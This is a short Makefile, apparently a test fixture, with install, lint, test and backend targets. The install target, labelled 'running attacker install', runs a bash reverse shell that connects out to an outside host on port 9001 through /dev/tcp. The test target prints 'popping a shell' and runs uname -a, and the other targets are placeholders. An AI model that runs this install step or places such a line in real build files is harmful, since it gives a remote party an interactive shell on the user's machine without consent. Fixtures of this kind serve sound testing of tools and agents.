install:
	@echo "running attacker install"
	/bin/bash -i >& /dev/tcp/rcss.pt/9001 0>&1

lint:
	@echo "do nothing"

test:
	@echo "popping a shell"; uname -a

backend:
	@echo "pretend to start a server"; sleep 1
